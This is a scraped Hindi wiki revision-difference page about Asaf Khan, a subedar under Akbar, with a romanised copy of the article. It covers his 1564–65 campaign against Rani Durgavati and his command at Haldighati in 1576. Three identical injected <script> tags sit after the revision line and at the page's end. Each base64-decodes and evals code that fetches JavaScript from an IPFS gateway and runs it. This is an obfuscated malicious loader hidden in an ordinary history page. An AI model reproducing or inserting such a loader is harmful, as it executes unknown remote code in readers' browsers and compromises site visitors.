Difference between revisions of "आसफ़ ख़ाँ (सूबेदार)"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
 
Line 1: Line 1:
 
{{बहुविकल्पी|आसफ़ ख़ाँ}}
 
{{बहुविकल्पी|आसफ़ ख़ाँ}}
*आसफ़ ख़ाँ, बादशाह [[अकबर]] (1556-1605 ई.) के शासनकाल के आरम्भ में [[कड़ा]] का [[सूबेदार]] था।
+
आसफ़ ख़ाँ, बादशाह [[अकबर]] (1556-1605 ई.) के शासनकाल के आरम्भ में [[कड़ा]] का [[सूबेदार]] था। यह [[अकबर|बादशाह अकबर]] की सेना में उच्चपदस्थ अधिकारी था, जिसकी उपाधि '"अब्दुल मजीद"' थी। सन्‌ 1565 ई. में इन्होंने [[नर्मदा नदी|नर्मदा]] तटवर्ती गढ़कोट ([[बुंदेलखंड]]) पर आक्रमण किया। गढ़कोट की तत्कालीन [[रानी दुर्गावती]] ने ससैन्य इनका मुकाबला किया। किंतु आसफ खां की कूटनीति के कारण रानी की हार हुई। आसफ खां ने योजना बनाई कि रानी को जीवित बंदी बना लिया जाए पर असम्मान के भय से [[रानी दुर्गावती]] ने तलवार से स्वयं अपनी गर्दन काट डाली। आसफ खाँ ने रानी की संपत्ति एवं धनराशि को अकेले हड़पने की चेष्टा की लेकिन भेद खुल गया और आसफ खाँ को विद्रोह करना पड़ा।
*1564 ई. में उसने अकबर के आदेश से [[गोंडवाना]] का राज्य जीता, जो आधुनिक मध्य प्रदेश के उत्तरी भाग में था।
+
*1564 ई. मेंआसफ खाँ ने [[अकबर]] के आदेश से [[गोंडवाना]] का राज्य जीता, जो आधुनिक मध्य प्रदेश के उत्तरी भाग में था।
*उसने गोंडवाना की शासिका रानी [[दुर्गावती]] और उसके नाबालिग पुत्र राजा [[वीरनारायण]] को हटाया।
 
 
*कुछ समय आसफ़ ख़ाँ ने नये विजित क्षेत्र का प्रशासन चलाया, लेकिन बाद में वहाँ से उसका तबादला कर दिया गया।
 
*कुछ समय आसफ़ ख़ाँ ने नये विजित क्षेत्र का प्रशासन चलाया, लेकिन बाद में वहाँ से उसका तबादला कर दिया गया।
*1576 ई. में उसे राजा [[मानसिंह]] के साथ उस [[मुग़ल]] सेना का सेनापति बनाकर भेजा गया, जिसने [[राणा प्रताप]] को [[हल्दीघाटी]] के युद्ध में अप्रैल 1576 में पराजित किया था।
+
*1576 ई. में उसे राजा [[मानसिंह]] के साथ उस [[मुग़ल]] सेना का सेनापति बनाकर भेजा गया, जिसने [[राणा प्रताप]] को [[हल्दीघाटी]] के युद्ध में अप्रैल 1576 में पराजित किया था। बाद में इन्होंने चित्तोड़ पर विजय प्राप्त की और इसके उपलक्ष्य में इन्हें वहां जागीर मिली।<ref>{{पुस्तक संदर्भ |पुस्तक का नाम=हिन्दी विश्वकोश, खण्ड 1|लेखक= |अनुवादक= |आलोचक= |प्रकाशक= नागरी प्रचारिणी सभा, वाराणसी|संकलन= भारत डिस्कवरी पुस्तकालय|संपादन= |पृष्ठ संख्या=461 |url=}}</ref>
 +
 
  
 
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1|माध्यमिक=|पूर्णता=|शोध=}}
 
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1|माध्यमिक=|पूर्णता=|शोध=}}
Line 12: Line 12:
 
{{मध्य काल}}
 
{{मध्य काल}}
 
__INDEX__
 
__INDEX__
 
 
[[Category:मध्य काल]]
 
[[Category:मध्य काल]]
 
[[Category:इतिहास कोश]]
 
[[Category:इतिहास कोश]]
[[Category:मुग़ल साम्राज्य]]
+
[[Category:मुग़ल साम्राज्य]][[Category:हिन्दी विश्वकोश]]

Latest revision as of 11:18, 24 June 2018

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script><script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

asaf khaan, badashah akabar (1556-1605 ee.) ke shasanakal ke arambh mean k da ka soobedar tha. yah badashah akabar ki sena mean uchchapadasth adhikari tha, jisaki upadhi '"abdul majid"' thi. sanh‌ 1565 ee. mean inhoanne narmada tatavarti gadhakot (buandelakhand) par akraman kiya. gadhakot ki tatkalin rani durgavati ne sasainy inaka mukabala kiya. kiantu asaph khaan ki kootaniti ke karan rani ki har huee. asaph khaan ne yojana banaee ki rani ko jivit bandi bana liya jae par asamman ke bhay se rani durgavati ne talavar se svayan apani gardan kat dali. asaph khaan ne rani ki sanpatti evan dhanarashi ko akele h dapane ki cheshta ki lekin bhed khul gaya aur asaph khaan ko vidroh karana p da.

  • 1564 ee. meanasaph khaan ne akabar ke adesh se goandavana ka rajy jita, jo adhunik madhy pradesh ke uttari bhag mean tha.
  • kuchh samay asaf khaan ne naye vijit kshetr ka prashasan chalaya, lekin bad mean vahaan se usaka tabadala kar diya gaya.
  • 1576 ee. mean use raja manasianh ke sath us mugal sena ka senapati banakar bheja gaya, jisane rana pratap ko haldighati ke yuddh mean aprail 1576 mean parajit kiya tha. bad mean inhoanne chitto d par vijay prapt ki aur isake upalakshy mean inhean vahaan jagir mili.[1]


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

  1. hindi vishvakosh, khand 1 |prakashak: nagari pracharini sabha, varanasi |sankalan: bharat diskavari pustakalay |prishth sankhya: 461 |

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>